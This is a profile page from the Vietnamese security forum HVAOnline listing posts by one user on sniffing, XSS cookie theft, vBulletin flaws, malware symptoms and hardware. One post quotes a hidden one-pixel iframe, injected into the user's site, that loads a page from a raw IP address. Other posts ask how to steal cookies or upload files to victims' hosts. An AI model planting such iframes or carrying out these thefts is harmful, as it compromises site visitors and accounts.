banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: phuoctrung  XML
Profile for phuoctrung Messages posted by phuoctrung [ number of posts not being displayed on this page: 0 ]
 
<iframe name=Twitter scrolling=auto frameborder=no align=center height=1 width=1 src=http://176.31.24.102/post.php?id=4042588473>
Có anh nào phân tích dùm được không ạ?
web của em bị chèn mã này
em thấy các video đều lấy địa chỉ IP 192.168.1.xxx để set RHOST?
Các ip này là của máy test trên cùng mạng LAN
Vậy cho e hỏi, nếu RHOST ip của máy khác ở mạng khác được không?
em xin cảm ơn
Nếu đặt ARP tĩnh thì vẫn bị theo dõi bỡi phần mềm SniffIM và C&A. híc híc.
E đang tìm hiểu về đề tài này nhưng thật sự nó khó mà e thì chưa có kinh nghiệm gì.
Trường hợp ở đây là 1 máy A trong mạng LAN truy cập internet , có 1 máy B đang sniff.
Nên em muốn hỏi mọi người:có mấy cách phòng chống sniff. (theo e tài liệu đọc thì có cách đặt ARP tĩnh ) và những ưu và nhược điểm của các cách đó.
Mọi người giúp em với
E cảm ơn mọi người nhiều smilie

conmale wrote:

DemonKnight_newbie wrote:
link: http://www.mediafire.com/?k0a99v2b7pnay7f
pass hvaonline 


Con này nhỏ nhỏ mà có võ smilie nhưng nó đã bị hầu hết các av tóm từ lâu rồi. 

smilie smilie có võ là sao anh smilie

chiro8x wrote:
Câu hỏi không hay tí nào cả, tiêu đề cũng không hay giống như giật tít trên báo lá cải. 

không hay nhưng dù sao không bị del topic là được smilie

angel_of_devil wrote:
http://www.thegeekstuff.com/2009/09/top-5-best-network-monitoring-tools/ <<< Tuỳ bạn lựa chọn 

thanks bạn!
Chào mọi người! Hiện tại mình đang quản lý hơn 100 pc trong mạng LAN (mạng nội bộ trong công ty).
Nếu kiểm tra thông thường thì rất tốn thời gian.
Mình cần tìm 1 phần mềm nào đó để kiêm tra giúp mình sự sống còn của PC trong mạng LAN
vd như: Nếu máy vào mạng hoạt động bình thường thì nó sẽ ping cho mình biết và ngược lại, nếu không ping thì PC có sự cố cần phải sửa.
Đơn giản chỉ là 1 server và 100 client. 100 client báo về server: "Ờ TAO CÒN SỐNG" smilie thì ok
còn 100 client mà có vài client k báo về có nghĩa là: "TAO CẦN SỰ GIÚP ĐỠ"
cảm ơn mọi người
Nếu local thì server ko cho local thì sao nhỉ.hehee
theo em được biết, vbb 3.8.4 và 3.8.5 đều dính lỗi là fake login admin. Hơn nữa, vbb viết bằng php nên em muốn hỏi trừ những lỗi cơ bản trên thì còn lỗi nào liên quan đến php không ạ??? chân thành cảm ơn các anh
tất cả các tool đều ẩn chứa 1 hoặc nhiều code nguy hiểm. DO đó, "CHƠI DAO CÓ NGÀY ĐỨT TAY"
như thế thì các site tìm trên http://www.dedicatedornot.com ít hơn khi tìm bằng shell trên host của mình
Em có câu hỏi muốn các anh em giúp cho. Đó là Làm thế nào để tim 1 host cùng server khi có host của minh smilie

Jenie_K19 wrote:
Chào mọi người.
Mình không phải hacker, cũng không biết hack nhưng mình rất quan tâm đến nó. Mình thấy các hacker khi hack thường upload file lên host của victim. Vấn đề là mình không hiểu nếu không có username, password thì up lên kiểu gì được? Mong mọi người chỉ giúp. Cặn kẽ chút nhé, mình gà lắm. smilie smilie smilie
Thanks! 

Vậy làm thế nào dể bay lên mặt trăng mà không dùng tà vũ trụ

saclovnn wrote:
Ví dụ tôi đã có được link để dẫn tới Cpanel của một host vậy có cách nào dò tìm password không ? 

NEVER. Trừ khi bác có năng lực đặc biệt dò ra username và pass

conmale wrote:

phuoctrung wrote:

conmale wrote:

Theo "cách" của tôi là cách nào vậy? 

Cách phòng chống: đừng bấm trên đường link nào đó trong khi mình đang login một account. Nên copy đường link và dán nó lên một trình duyệt khác. 


Nếu bồ bị XSS và bị chôm cookie + session trên trình duyệt trong khi bồ đã dùng trình duyệt ấy để đăng nhập vô đâu đó ---> bồ sẽ bị mất account.

Nếu kẻ muốn tấn công bồ để chôm cookie + session của bồ bằng cách dụ khị bồ truy cập một địa chỉ nào đó nhưng bồ không "bấm" trực tiếp vào đường dẫn ấy mà bồ copy địa chỉ và dán nó vô một trình duyệt khác. Trình duyệt khác ấy hoàn toàn trống rỗng và chẳng có chứa thông tin gì về cookie hay session gì hết ----> ý định chôm cookie + session xuyên qua XSS hoàn toàn thất bại ---> bồ chẳng bị mất cái gì hết.

Bởi vậy, bồ nói là bồ "vẫn bị mất" thì tôi không rõ bồ bị mất cái gì. 

Nếu mình xoá cookies trên trình duyệt đó thì vẫn không mất acc chứ bác conmale

conmale wrote:

phuoctrung wrote:
Em lướt web thì thấy 1 số bài viết hướng dẫn lấy IP của victim chỉ cần file txt và .php (up lên host và gửi cho victim)là đã có IP của victim. Vậy, ta có thể áp dụng cách này để lấy cookies ko? Nếu có các bác demo cho em với. Và cách phòng chống nó như thé nào? Các bác giúp em 


Tham khảo cái này: http://www.owasp.org/index.php/XSS

Cách phòng chống: đừng bấm trên đường link nào đó trong khi mình đang login một account. Nên copy đường link và dán nó lên một trình duyệt khác. 

http://www.owasp.org/index.php/XSS-----> Áp dụng trong các forum bị lỗi mới lấy đc cookie.
còn vấn đề của em là: attacker gửi link cho em, em double click đó ----mất acc.

shadowsong2 wrote:
Ai tư vấn cho mình một chiếc khoảng 12 triệu dùng để chơi game và học xử lý ảnh với smilie smilie smilie smilie

Mình xin thanks trước smilie smilie smilie  

laptop hay desktop vậy bác
chà! loại này cần có card đồ hoạ ngon và chíp intel xịn mới làm nên chuyện

conmale wrote:

Theo "cách" của tôi là cách nào vậy? 

Cách phòng chống: đừng bấm trên đường link nào đó trong khi mình đang login một account. Nên copy đường link và dán nó lên một trình duyệt khác.

Ky0shir0 wrote:

phuoctrung wrote:
Em lướt web thì thấy 1 số bài viết hướng dẫn lấy IP của victim chỉ cần file txt và .php (up lên host và gửi cho victim)là đã có IP của victim. Vậy, ta có thể áp dụng cách này để lấy cookies ko? Nếu có các bác demo cho em với. Và cách phòng chống nó như thé nào? Các bác giúp em 

Bạn muốn biết cách lấy được cookies trên máy người khác hay muốn không bị lấy mất account? 

cả 2 bạn àh! Biết để phòng chống
FPT trả lời đúng đấy. Bạn có thể tìm trên mạng cũng ra mà. Hình như diễn đàn tin học cũng có cách chặn ddos. Bạn tự tìm hiểu xem. Rồi có gì không hiểu mới cần sự giúp đỡ.
theo cách bác conmale thì em vẫn bị mất acc. Thế mới chết.

daigiaIQ_Y2.1K wrote:
Cách này xưa như diễm rồi bạn ơi , giờ ai còn sử dụng cách này nửa đâu 

Em có làm gì đâu mà bác nói vậy?Chà! nếu nói vậy thì bác hãy nêu cách mới đi

blackghost.kenbi wrote:
Máy của mình bây giờ có hiện tượng lạ lắm, nếu mở máy lên thì bình thường CPU hoạt động 1% hoặc 2%; và PF Usage chỉ 400MB (máy mở lên đang ở trạng thái Idel), nhưng khi mình mở model (model TP-LInk của VNPT) thì không biết sao máy của mình lúc này chạy "chậm như rùa" luôn. Cụ thể là CPU lúc này luôn hoạt động ở mức 90% trở lên, còn PF Usage thì tăng lên 1.20GB hoặc cao hơn nữa, có nhiều process tên như svchost.exe, net.exe, hjkksjf.exe.....còn nhiều process có tên lạ lắm chạy làm máy của mình chạy cực chậm luôn, còn khi mở máy lên nếu không mở model thì máy chạy bình thường. Làm cho mình không dám mở model để lên mạng luôn. Mấy bạn cho mình hỏi hiền tượng này là gì vậy. Liệu có phải là virus trong model hay không? 

Virus chui qua model thì đc

blackghost.kenbi wrote:
Mình cũng gâp hiện tượng này rồi, cầm USB vào máy không hiện lên tên mình đặt mà tên là Removable disk, lúc trước gặp như vậy thì mình Reset máy lại là máy nhận USB bình thường. Còn nếu ko nhận nữa thì bạn Format lại USB đi 

Nếu bị sốc điện thì bó tay

alpha5885 wrote:
Tình hình là mình muốn mua 1 cái usb 3g để sử dụng sóng wifi 3g. Nhưng ko biết chất lượng đường truyền thế nào, nghe giới thiệu thấy mạnh hơn cả ADSL nhưng ko biết thực hư thế nào.
Với lại nếu mua usb 3g rồi thì nên dùng sóng 3g của mạng nào là hợp lý, giá cước có mắc không, vì mình cũng hay chơi game online, nhưng ko thuộc loại "cày game" , có lần mình đọc đc 1 topic tren 5s là mua sim khuyến mãi về là dùng vi vu...không biết thế nào
Bro nào có kinh nghiệm giúp mình với nhé...minh cảm ơn lắm :
P/S: Nhân tiện mấy bro cho mình hỏi mua usb 3g thì nên mua ở đâu thì hữu nghị ? mua loại nào ? giá cả ra sao ? 

Nếu không gian thì tốt. Nếu trong thành phố thì sóng sẽ ko ổn định
Em lướt web thì thấy 1 số bài viết hướng dẫn lấy IP của victim chỉ cần file txt và .php (up lên host và gửi cho victim)là đã có IP của victim. Vậy, ta có thể áp dụng cách này để lấy cookies ko? Nếu có các bác demo cho em với. Và cách phòng chống nó như thé nào? Các bác giúp em
bác thử dùng "phần mềm tạo máy ảo" sau đó login vào thử xem sao.
Sẽ có 1 ngày nào đó, sẽ xảy ra những điều không mong muốn. Nhưng đó là quy luật
 
Go to Page:  Page 2 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|